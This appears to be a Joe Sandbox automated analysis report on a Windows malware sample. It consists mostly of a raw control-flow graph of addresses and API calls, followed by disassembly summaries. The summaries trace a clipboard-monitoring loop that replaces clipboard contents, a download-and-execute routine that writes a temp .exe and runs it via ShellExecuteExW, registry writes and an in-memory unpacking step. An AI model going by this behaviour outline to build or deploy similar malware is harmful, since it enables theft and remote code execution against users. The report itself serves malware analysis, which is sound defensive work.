65014->65015 65016 43f94d 65014->65016 65018 43f983 65015->65018 65019 43f96c 65015->65019 65091 42eac9 20 API calls __dosmaperr 65016->65091 65095 434faa 10 API calls 2 library calls 65018->65095 65093 42eac9 20 API calls __dosmaperr 65019->65093 65021 43f952 65092 42a59d 26 API calls _Deallocate 65021->65092 65023 43f971 65094 42a59d 26 API calls _Deallocate 65023->65094 65024 43f98a MultiByteToWideChar 65027 43f9b9 65024->65027 65028 43f9a9 GetLastError 65024->65028 65097 4336a7 21 API calls 3 library calls 65027->65097 65096 42ea93 20 API calls 3 library calls 65028->65096 65031 43cfe1 65031->65007 65038 43d03c 65031->65038 65032 43f9c1 65033 43f9e9 65032->65033 65034 43f9c8 MultiByteToWideChar 65032->65034 65035 43346a _free 20 API calls 65033->65035 65034->65033 65036 43f9dd GetLastError 65034->65036 65035->65031 65098 42ea93 20 API calls 3 library calls 65036->65098 65099 43cd9f 65038->65099 65041 43d087 65117 43977e 65041->65117 65042 43d06e 65131 42eab6 20 API calls __dosmaperr 65042->65131 65045 43d08c 65046 43d095 65045->65046 65047 43d0ac 65045->65047 65133 42eab6 20 API calls __dosmaperr 65046->65133 65130 43cd0a CreateFileW 65047->65130 65051 43d09a 65134 42eac9 20 API calls __dosmaperr 65051->65134 65052 43d0e5 65054 43d162 GetFileType 65052->65054 65056 43d137 GetLastError 65052->65056 65135 43cd0a CreateFileW 65052->65135 65055 43d16d GetLastError 65054->65055 65059 43d1b4 65054->65059 65137 42ea93 20 API calls 3 library calls 65055->65137 65136 42ea93 20 API calls 3 library calls 65056->65136 65139 4396c7 21 API calls 3 library calls 65059->65139 65060 43d073 65132 42eac9 20 API calls __dosmaperr 65060->65132 65061 43d17b CloseHandle 65061->65060 65065 43d1a4 65061->65065 65064 43d12a 65064->65054 65064->65056 65138 42eac9 20 API calls __dosmaperr 65065->65138 65066 43d1d5 65068 43d221 65066->65068 65140 43cf1b 169 API calls 4 library calls 65066->65140 65073 43d24e 65068->65073 65141 43cabd 167 API calls 4 library calls 65068->65141 65069 43d1a9 65069->65060 65072 43d247 65072->65073 65074 43d25f 65072->65074 65142 4335cd 29 API calls 2 library calls 65073->65142 65076 43d009 65074->65076 65077 43d2dd CloseHandle 65074->65077 65085 43346a 65076->65085 65143 43cd0a CreateFileW 65077->65143 65079 43d308 65080 43d312 GetLastError 65079->65080 65084 43d257 65079->65084 65144 42ea93 20 API calls 3 library calls 65080->65144 65082 43d31e 65145 439890 21 API calls 3 library calls 65082->65145 65084->65076 65086 43349e _free 65085->65086 65087 433475 HeapFree 65085->65087 65086->65007 65087->65086 65088 43348a 65087->65088 65168 42eac9 20 API calls __dosmaperr 65088->65168 65090 433490 GetLastError 65090->65086 65091->65021 65092->65031 65093->65023 65094->65031 65095->65024 65096->65031 65097->65032 65098->65033 65100 43cdc0 65099->65100 65101 43cdda 65099->65101 65100->65101 65153 42eac9 20 API calls __dosmaperr 65100->65153 65146 43cd2f 65101->65146 65104 43cdcf 65154 42a59d 26 API calls _Deallocate 65104->65154 65106 43ce12 65107 43ce41 65106->65107 65155 42eac9 20 API calls __dosmaperr 65106->65155 65114 43ce94 65107->65114 65157 42ffdf 26 API calls 2 library calls 65107->65157 65110 43ce8f 65112 43cf0e 65110->65112 65110->65114 65111 43ce36 65156 42a59d 26 API calls _Deallocate 65111->65156 65158 42a5ca 11 API calls _Atexit 65112->65158 65114->65041 65114->65042 65116 43cf1a 65118 43978a ___BuildCatchObject 65117->65118 65161 42e3ed EnterCriticalSection 65118->65161 65120 4397d8 65162 439887 65120->65162 65121 4397b6 65165 43955d 21 API calls 3 library calls 65121->65165 65122 439791 65122->65120 65122->65121 65127 439824 EnterCriticalSection 65122->65127 65124 439801 __wsopen_s 65124->65045 65126 4397bb 65126->65120 65166 4396a4 EnterCriticalSection 65126->65166 65127->65120 65128 439831 LeaveCriticalSection 65127->65128 65128->65122 65130->65052 65131->65060 65132->65076 65133->65051 65134->65060 65135->65064 65136->65060 65137->65061 65138->65069 65139->65066 65140->65068 65141->65072 65142->65084 65143->65079 65144->65082 65145->65084 65149 43cd47 65146->65149 65147 43cd62 65147->65106 65149->65147 65159 42eac9 20 API calls __dosmaperr 65149->65159 65150 43cd86 65160 42a59d 26 API calls _Deallocate 65150->65160 65152 43cd91 65152->65106 65153->65104 65154->65101 65155->65111 65156->65107 65157->65110 65158->65116 65159->65150 65160->65152 65161->65122 65167 42e435 LeaveCriticalSection 65162->65167 65164 43988e 65164->65124 65165->65126 65166->65120 65167->65164 65168->65090 65169 43410a 65170 434116 ___BuildCatchObject 65169->65170 65171 434122 65170->65171 65172 434139 65170->65172 65203 42eac9 20 API calls __dosmaperr 65171->65203 65182 42caff EnterCriticalSection 65172->65182 65175 434127 65204 42a59d 26 API calls _Deallocate 65175->65204 65176 434149 65183 434186 65176->65183 65179 434155 65205 43417c LeaveCriticalSection __fread_nolock 65179->65205 65181 434132 __wsopen_s 65182->65176 65184 434194 65183->65184 65185 4341ae 65183->65185 65216 42eac9 20 API calls __dosmaperr 65184->65216 65206 432908 65185->65206 65188 434199 65217 42a59d 26 API calls _Deallocate 65188->65217 65189 4341b7 65213 4347d3 65189->65213 65193 4342bb 65195 4342c8 65193->65195 65199 43426e 65193->65199 65194 43423f 65197 43425c 65194->65197 65194->65199 65219 42eac9 20 API calls __dosmaperr 65195->65219 65218 43449f 31 API calls 4 library calls 65197->65218 65201 4341a4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 65199->65201 65220 43431b 30 API calls 2 library calls 65199->65220 65200 434266 65200->65201 65201->65179 65203->65175 65204->65181 65205->65181 65207 432914 65206->65207 65208 432929 65206->65208 65221 42eac9 20 API calls __dosmaperr 65207->65221 65208->65189 65210 432919 65222 42a59d 26 API calls _Deallocate 65210->65222 65212 432924 65212->65189 65223 434650 65213->65223 65215 4341d3 65215->65193 65215->65194 65215->65201 65216->65188 65217->65201 65218->65200 65219->65201 65220->65201 65221->65210 65222->65212 65224 43465c ___BuildCatchObject 65223->65224 65225 434664 65224->65225 65230 43467c 65224->65230 65258 42eab6 20 API calls __dosmaperr 65225->65258 65227 434730 65263 42eab6 20 API calls __dosmaperr 65227->65263 65228 434669 65259 42eac9 20 API calls __dosmaperr 65228->65259 65230->65227 65233 4346b4 65230->65233 65232 434735 65264 42eac9 20 API calls __dosmaperr 65232->65264 65248 4396a4 EnterCriticalSection 65233->65248 65236 43473d 65265 42a59d 26 API calls _Deallocate 65236->65265 65237 4346ba 65239 4346f3 65237->65239 65240 4346de 65237->65240 65249 434755 65239->65249 65260 42eac9 20 API calls __dosmaperr 65240->65260 65242 434671 __wsopen_s 65242->65215 65244 4346e3 65261 42eab6 20 API calls __dosmaperr 65244->65261 65245 4346ee 65262 434728 LeaveCriticalSection __wsopen_s 65245->65262 65248->65237 65266 439921 65249->65266 65251 434767 65252 434780 SetFilePointerEx 65251->65252 65253 43476f 65251->65253 65255 434798 GetLastError 65252->65255 65256 434774 65252->65256 65279 42eac9 20 API calls __dosmaperr 65253->65279 65280 42ea93 20 API calls 3 library calls 65255->65280 65256->65245 65258->65228 65259->65242 65260->65244 65261->65245 65262->65242 65263->65232 65264->65236 65265->65242 65267 439943 65266->65267 65268 43992e 65266->65268 65273 439968 65267->65273 65283 42eab6 20 API calls __dosmaperr 65267->65283 65281 42eab6 20 API calls __dosmaperr 65268->65281 65270 439933 65282 42eac9 20 API calls __dosmaperr 65270->65282 65273->65251 65274 439973 65284 42eac9 20 API calls __dosmaperr 65274->65284 65276 43997b 65285 42a59d 26 API calls _Deallocate 65276->65285 65277 43993b 65277->65251 65279->65256 65280->65256 65281->65270 65282->65277 65283->65274 65284->65276 65285->65277 65286 4b0000 65289 4b0006 65286->65289 65290 4b0015 65289->65290 65293 4b07a6 65290->65293 65298 4b07c1 65293->65298 65294 4b07ca CreateToolhelp32Snapshot 65295 4b07e6 Module32First 65294->65295 65294->65298 65296 4b0005 65295->65296 65297 4b07f5 65295->65297 65300 4b0465 65297->65300 65298->65294 65298->65295 65301 4b0490 65300->65301 65302 4b04a1 VirtualAlloc 65301->65302 65303 4b04d9 65301->65303 65302->65303 65304 402bad RegCreateKeyExW 65305 402bdb RegSetValueExW 65304->65305 65306 402bef 65304->65306 65305->65306 65307 402bf4 RegCloseKey 65306->65307 65308 402bfd 65306->65308 65307->65308 65309 212003c 65310 2120049 65309->65310 65324 2120e0f SetErrorMode SetErrorMode 65310->65324 65315 2120265 65316 21202ce VirtualProtect 65315->65316 65318 212030b 65316->65318 65317 2120439 VirtualFree 65319 21204be 65317->65319 65321 21205f4 LoadLibraryA 65317->65321 65318->65317 65320 21204e3 LoadLibraryA 65319->65320 65319->65321 65320->65319 65323 21208c7 65321->65323 65325 2120223 65324->65325 65326 2120d90 65325->65326 65327 2120dad 65326->65327 65328 2120dbb GetPEB 65327->65328 65329 2120238 VirtualAlloc 65327->65329 65328->65329 65329->65315 65330 404b8e 65331 404b9a Concurrency::details::_TaskCollection::_TaskCollection 65330->65331 65336 40fb0c 65331->65336 65335 404bba ISource Concurrency::details::_TaskCollection::_TaskCollection 65338 40fb11 65336->65338 65339 404ba3 65338->65339 65341 40fb2d Concurrency::SchedulerPolicy::_Initialize 65338->65341 65360 42ad7e 65338->65360 65367 42f450 7 API calls 2 library calls 65338->65367 65344 4051d0 65339->65344 65368 42860d RaiseException 65341->65368 65343 4103cc 65345 4051dc __Cnd_init Concurrency::details::_TaskCollection::_TaskCollection 65344->65345 65347 4051f4 __Mtx_init 65345->65347 65379 40ce32 28 API calls std::_Throw_Cpp_error 65345->65379 65348 40521b 65347->65348 65380 40ce32 28 API calls std::_Throw_Cpp_error 65347->65380 65371 4010ea 65348->65371 65354 40526a 65356 40527f ISource 65354->65356 65382 401128 30 API calls 2 library calls 65354->65382 65383 401109 65356->65383 65359 4052a4 Concurrency::details::_TaskCollection::_TaskCollection 65359->65335 65365 4336a7 __dosmaperr 65360->65365 65361 4336e5 65370 42eac9 20 API calls __dosmaperr 65361->65370 65362 4336d0 RtlAllocateHeap 65364 4336e3 65362->65364 65362->65365 65364->65338 65365->65361 65365->65362 65369 42f450 7 API calls 2 library calls 65365->65369 65367->65338 65368->65343 65369->65365 65370->65364 65387 40d313 65371->65387 65373 401103 65376 40cef3 65373->65376 65411 42e114 65376->65411 65379->65347 65380->65348 65381 40ce32 28 API calls std::_Throw_Cpp_error 65381->65354 65382->65354 65384 401115 __Mtx_unlock 65383->65384 65385 401122 65384->65385 65736 40ce32 28 API calls std::_Throw_Cpp_error 65384->65736 65385->65359 65391 40d06d 65387->65391 65390 40ce32 28 API calls std::_Throw_Cpp_error 65390->65373 65392 40d0c3 65391->65392 65393 40d095 GetCurrentThreadId 65391->65393 65394 40d0c7 GetCurrentThreadId 65392->65394 65399 40d0ed 65392->65399 65395 40d0a0 GetCurrentThreadId 65393->65395 65406 40d0bb 65393->65406 65404 40d0d6 65394->65404 65395->65406 65396 40d186 GetCurrentThreadId 65396->65404 65397 40d1dd GetCurrentThreadId 65397->65406 65398 40f8cf __ehhandler$___std_fs_change_permissions@12 5 API calls 65401 4010f6 65398->65401 65399->65396 65400 40d10d 65399->65400 65409 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65400->65409 65401->65373 65401->65390 65404->65397 65404->65406 65405 40d145 GetCurrentThreadId 65405->65404 65407 40d118 __Xtime_diff_to_millis2 65405->65407 65406->65398 65407->65404 65407->65405 65407->65406 65410 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65407->65410 65409->65407 65410->65407 65412 42e121 65411->65412 65413 42e135 65411->65413 65434 42eac9 20 API calls __dosmaperr 65412->65434 65425 42e0cb 65413->65425 65416 42e126 65435 42a59d 26 API calls _Deallocate 65416->65435 65419 42e14a CreateThread 65421 42e175 65419->65421 65422 42e169 GetLastError 65419->65422 65456 42dfc0 65419->65456 65420 405257 65420->65354 65420->65381 65437 42e03d 65421->65437 65436 42ea93 20 API calls 3 library calls 65422->65436 65445 434d2a 65425->65445 65428 43346a _free 20 API calls 65429 42e0e4 65428->65429 65430 42e103 65429->65430 65431 42e0eb GetModuleHandleExW 65429->65431 65432 42e03d __Thrd_start 22 API calls 65430->65432 65431->65430 65433 42e10d 65432->65433 65433->65419 65433->65421 65434->65416 65435->65420 65436->65421 65438 42e04a 65437->65438 65444 42e06e 65437->65444 65439 42e050 CloseHandle 65438->65439 65440 42e059 65438->65440 65439->65440 65441 42e068 65440->65441 65442 42e05f FreeLibrary 65440->65442 65443 43346a _free 20 API calls 65441->65443 65442->65441 65443->65444 65444->65420 65446 434d37 65445->65446 65447 434d77 65446->65447 65448 434d62 HeapAlloc 65446->65448 65453 434d4b __dosmaperr 65446->65453 65455 42eac9 20 API calls __dosmaperr 65447->65455 65449 434d75 65448->65449 65448->65453 65451 42e0db 65449->65451 65451->65428 65453->65447 65453->65448 65454 42f450 7 API calls 2 library calls 65453->65454 65454->65453 65455->65451 65457 42dfcc _Atexit 65456->65457 65458 42dfd3 GetLastError ExitThread 65457->65458 65459 42dfe0 65457->65459 65472 431eda GetLastError 65459->65472 65461 42dfe5 65492 435571 65461->65492 65464 42dffb 65499 401169 65464->65499 65473 431ef0 65472->65473 65474 431ef6 65472->65474 65507 435111 11 API calls 2 library calls 65473->65507 65476 434d2a __dosmaperr 20 API calls 65474->65476 65478 431f45 SetLastError 65474->65478 65477 431f08 65476->65477 65479 431f10 65477->65479 65508 435167 11 API calls 2 library calls 65477->65508 65478->65461 65481 43346a _free 20 API calls 65479->65481 65483 431f16 65481->65483 65482 431f25 65482->65479 65484 431f2c 65482->65484 65485 431f51 SetLastError 65483->65485 65509 431d4c 20 API calls __dosmaperr 65484->65509 65510 42df7d 167 API calls 2 library calls 65485->65510 65487 431f37 65489 43346a _free 20 API calls 65487->65489 65491 431f3e 65489->65491 65490 431f5d 65491->65478 65491->65485 65493 435596 65492->65493 65494 43558c 65492->65494 65511 434e93 5 API calls 2 library calls 65493->65511 65496 40f8cf __ehhandler$___std_fs_change_permissions@12 5 API calls 65494->65496 65497 42dff0 65496->65497 65497->65464 65506 4354a4 10 API calls 2 library calls 65497->65506 65498 4355ad 65498->65494 65512 405800 65499->65512 65525 40155a Sleep 65499->65525 65500 401173 65503 42e199 65500->65503 65704 42e074 65503->65704 65505 42e1a6 65506->65464 65507->65474 65508->65482 65509->65487 65510->65490 65511->65498 65513 40580c Concurrency::details::_TaskCollection::_TaskCollection 65512->65513 65514 4010ea std::_Cnd_initX 35 API calls 65513->65514 65515 405821 __Cnd_signal 65514->65515 65516 405839 65515->65516 65571 40ce32 28 API calls std::_Throw_Cpp_error 65515->65571 65518 401109 std::_Cnd_initX 28 API calls 65516->65518 65519 405842 65518->65519 65527 4029f4 InternetOpenW 65519->65527 65543 4016df 65519->65543 65522 405849 ISource Concurrency::details::_TaskCollection::_TaskCollection 65522->65500 65526 4016d5 65525->65526 65528 402a27 InternetOpenUrlW 65527->65528 65529 402b9c 65527->65529 65528->65529 65530 402a3d GetTempPathW GetTempFileNameW 65528->65530 65532 40f8cf __ehhandler$___std_fs_change_permissions@12 5 API calls 65529->65532 65572 42a88e 65530->65572 65534 402bab 65532->65534 65564 40e76b 65534->65564 65535 402b8b InternetCloseHandle InternetCloseHandle 65535->65529 65536 402aa8 Hash 65537 402ac0 InternetReadFile WriteFile 65536->65537 65538 402b00 CloseHandle 65536->65538 65537->65536 65574 402960 65538->65574 65541 402b2b ShellExecuteExW 65541->65535 65542 402b72 WaitForSingleObject CloseHandle 65541->65542 65542->65535 65682 40fde6 65543->65682 65545 4016eb Sleep 65683 40cc10 65545->65683 65548 40cc10 28 API calls 65549 401711 65548->65549 65550 40171b OpenClipboard 65549->65550 65551 401943 Sleep 65550->65551 65552 40172b GetClipboardData 65550->65552 65551->65550 65553 40173b GlobalLock 65552->65553 65554 40193d CloseClipboard 65552->65554 65553->65554 65555 401748 _strlen 65553->65555 65554->65551 65555->65554 65556 40cbc7 28 API calls std::system_error::system_error 65555->65556 65557 40cc10 28 API calls 65555->65557 65559 4018d2 EmptyClipboard GlobalAlloc 65555->65559 65687 402e66 167 API calls 2 library calls 65555->65687 65689 40caa6 26 API calls _Deallocate 65555->65689 65556->65555 65557->65555 65559->65555 65560 4018eb GlobalLock 65559->65560 65688 426990 65560->65688 65563 401905 GlobalUnlock SetClipboardData GlobalFree 65563->65555 65695 40deea 65564->65695 65569 40e810 65569->65522 65570 40e782 __Cnd_do_broadcast_at_thread_exit __Mtx_unlock __Cnd_broadcast 65702 40def6 LeaveCriticalSection std::_Lockit::~_Lockit 65570->65702 65571->65516 65573 402a76 CreateFileW 65572->65573 65573->65535 65573->65536 65575 40298b _wcslen Hash 65574->65575 65584 42b454 65575->65584 65579 4029b8 65606 404333 65579->65606 65582 40f8cf __ehhandler$___std_fs_change_permissions@12 5 API calls 65583 4029f2 65582->65583 65583->65535 65583->65541 65610 42b106 65584->65610 65587 402823 65588 402832 Concurrency::details::_TaskCollection::_TaskCollection 65587->65588 65636 4032dd 65588->65636 65590 402846 65652 403b8b 65590->65652 65592 40285a 65593 402888 65592->65593 65594 40286c 65592->65594 65658 403112 65593->65658 65679 40329a 167 API calls 65594->65679 65597 402895 65661 403c20 65597->65661 65599 4028a7 65671 403cc2 65599->65671 65601 40287f std::ios_base::_Ios_base_dtor Concurrency::details::_TaskCollection::_TaskCollection 65601->65579 65602 4028c4 65603 404333 26 API calls 65602->65603 65604 4028e3 65603->65604 65680 40329a 167 API calls 65604->65680 65607 40433b 65606->65607 65609 4029e4 65606->65609 65681 40cc96 26 API calls 2 library calls 65607->65681 65609->65582 65611 42b133 65610->65611 65612 42b142 65611->65612 65613 42b15a 65611->65613 65624 42b137 65611->65624 65615 42eac9 __Wcscoll 20 API calls 65612->65615 65614 42a747 __fassign 162 API calls 65613->65614 65616 42b165 65614->65616 65618 42b147 65615->65618 65619 42b170 65616->65619 65620 42b307 65616->65620 65617 40f8cf __ehhandler$___std_fs_change_permissions@12 5 API calls 65621 4029a4 65617->65621 65622 42a59d pre_c_initialization 26 API calls 65618->65622 65626 42b218 WideCharToMultiByte 65619->65626 65628 42b17b 65619->65628 65633 42b1b5 WideCharToMultiByte 65619->65633 65623 42b334 WideCharToMultiByte 65620->65623 65625 42b312 65620->65625 65621->65587 65622->65624 65623->65625 65624->65617 65625->65624 65627 42eac9 __Wcscoll 20 API calls 65625->65627 65626->65628 65629 42b243 65626->65629 65627->65624 65628->65624 65632 42eac9 __Wcscoll 20 API calls 65628->65632 65629->65628 65631 42b24c GetLastError 65629->65631 65631->65628 65635 42b25b 65631->65635 65632->65624 65633->65628 65634 42b274 WideCharToMultiByte 65634->65625 65634->65635 65635->65624 65635->65625 65635->65634 65637 4032e9 Concurrency::details::_TaskCollection::_TaskCollection 65636->65637 65638 40467c 167 API calls 65637->65638 65639 403315 65638->65639 65640 40484d 167 API calls 65639->65640 65641 40333e 65640->65641 65642 40458c 26 API calls 65641->65642 65643 40334d 65642->65643 65644 403392 std::ios_base::_Ios_base_dtor 65643->65644 65645 40dde3 167 API calls 65643->65645 65646 4033ce Concurrency::details::_TaskCollection::_TaskCollection 65644->65646 65648 40c618 167 API calls 65644->65648 65647 403362 65645->65647 65646->65590 65647->65644 65649 40458c 26 API calls 65647->65649 65648->65646 65650 403373 65649->65650 65651 404c14 167 API calls 65650->65651 65651->65644 65653 403b97 Concurrency::details::_TaskCollection::_TaskCollection 65652->65653 65654 4042af 167 API calls 65653->65654 65655 403ba3 65654->65655 65656 403bc7 Concurrency::details::_TaskCollection::_TaskCollection 65655->65656 65657 4034fb 167 API calls 65655->65657 65656->65592 65657->65656 65659 404356 28 API calls 65658->65659 65660 40312c Hash 65659->65660 65660->65597 65662 403c2c Concurrency::details::_TaskCollection::_TaskCollection 65661->65662 65663 40c618 167 API calls 65662->65663 65664 403c4f 65663->65664 65665 4042af 167 API calls 65664->65665 65666 403c59 65665->65666 65668 403c9c Concurrency::details::_TaskCollection::_TaskCollection 65666->65668 65670 4034fb 167 API calls 65666->65670 65667 403c7a 65667->65668 65669 4046ca 167 API calls 65667->65669 65668->65599 65669->65668 65670->65667 65672 403cce __EH_prolog3_catch 65671->65672 65673 4042af 167 API calls 65672->65673 65675 403ce7 65673->65675 65674 4046ca 167 API calls 65677 403d70 Concurrency::details::_TaskCollection::_TaskCollection 65674->65677 65676 403d17 65675->65676 65678 40369f 40 API calls 65675->65678 65676->65674 65677->65602 65678->65676 65679->65601 65680->65601 65681->65609 65682->65545 65684 40cc2c _strlen 65683->65684 65690 40cbc7 65684->65690 65686 401704 65686->65548 65687->65555 65688->65563 65689->65555 65691 40cbfa 65690->65691 65692 40cbd6 BuildCatchObjectHelperInternal 65690->65692 65691->65692 65694 40cb5c 28 API calls 4 library calls 65691->65694 65692->65686 65694->65692 65703 40f22a EnterCriticalSection 65695->65703 65697 40def4 65698 40ce99 GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 65697->65698 65699 40ced2 65698->65699 65700 40cec7 CloseHandle 65698->65700 65701 40ced6 GetCurrentThreadId 65699->65701 65700->65701 65701->65570 65702->65569 65703->65697 65713 431f5e GetLastError 65704->65713 65706 42e083 ExitThread 65707 42e0a1 65710 42e0b4 65707->65710 65711 42e0ad CloseHandle 65707->65711 65710->65706 65712 42e0c0 FreeLibraryAndExitThread 65710->65712 65711->65710 65714 431f7d 65713->65714 65715 431f77 65713->65715 65717 434d2a __dosmaperr 17 API calls 65714->65717 65719 431fd4 SetLastError 65714->65719 65733 435111 11 API calls 2 library calls 65715->65733 65718 431f8f 65717->65718 65720 431f97 65718->65720 65734 435167 11 API calls 2 library calls 65718->65734 65722 42e07f 65719->65722 65724 43346a _free 17 API calls 65720->65724 65722->65706 65722->65707 65732 4354f6 10 API calls 2 library calls 65722->65732 65723 431fac 65723->65720 65725 431fb3 65723->65725 65726 431f9d 65724->65726 65735 431d4c 20 API calls __dosmaperr 65725->65735 65728 431fcb SetLastError 65726->65728 65728->65722 65729 431fbe 65730 43346a _free 17 API calls 65729->65730 65731 431fc4 65730->65731 65731->65719 65731->65728 65732->65707 65733->65714 65734->65723 65735->65729 65736->65385 65737 40239e 65738 402561 PostQuitMessage 65737->65738 65739 4023b2 65737->65739 65740 40255f 65738->65740 65741 4023b9 DefWindowProcW 65739->65741 65742 4023d0 65739->65742 65741->65740 65742->65740 65743 4029f4 167 API calls 65742->65743 65743->65740

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 004016E6
                                                                                                                                                                                                                                        • Sleep.KERNEL32(00001541,0000004C), ref: 004016F0
                                                                                                                                                                                                                                          • Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27
                                                                                                                                                                                                                                        • OpenClipboard.USER32(00000000), ref: 0040171D
                                                                                                                                                                                                                                        • GetClipboardData.USER32(00000001), ref: 0040172D
                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0040173C
                                                                                                                                                                                                                                        • _strlen.LIBCMT ref: 00401749
                                                                                                                                                                                                                                        • _strlen.LIBCMT ref: 00401778
                                                                                                                                                                                                                                        • _strlen.LIBCMT ref: 004018BC
                                                                                                                                                                                                                                        • EmptyClipboard.USER32 ref: 004018D2
                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004018FD
                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00401909
                                                                                                                                                                                                                                        • SetClipboardData.USER32(00000001,00000000), ref: 00401912
                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00401919
                                                                                                                                                                                                                                        • CloseClipboard.USER32 ref: 0040193D
                                                                                                                                                                                                                                        • Sleep.KERNEL32(000002D2), ref: 00401948
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                                                                                                                                                        • String ID: i
                                                                                                                                                                                                                                        • API String ID: 1583243082-3865851505
                                                                                                                                                                                                                                        • Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                                                                                                                                                                                                        • Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
                                                                                                                                                                                                                                        • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
                                                                                                                                                                                                                                        • GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
                                                                                                                                                                                                                                        • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
                                                                                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
                                                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00402B07
                                                                                                                                                                                                                                        • ShellExecuteExW.SHELL32(?), ref: 00402B68
                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00402B89
                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00402B92
                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00402B95
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                                                                                                                                                        • String ID: .exe$<$ShareScreen
                                                                                                                                                                                                                                        • API String ID: 3323492106-493228180
                                                                                                                                                                                                                                        • Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                                                                                                                                                                                                        • Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 004B07CE
                                                                                                                                                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 004B07EE
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557098712.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4b0000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3833638111-0
                                                                                                                                                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                        • Instruction ID: 0ee5d2996cb4697eab9abdc46cf28c4c5ec05b61019354676a638acd7f008353
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2F062311017116FD7203AB5988DAAFB7ECAF49766F10056AE642911C0DE78F8454A75

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
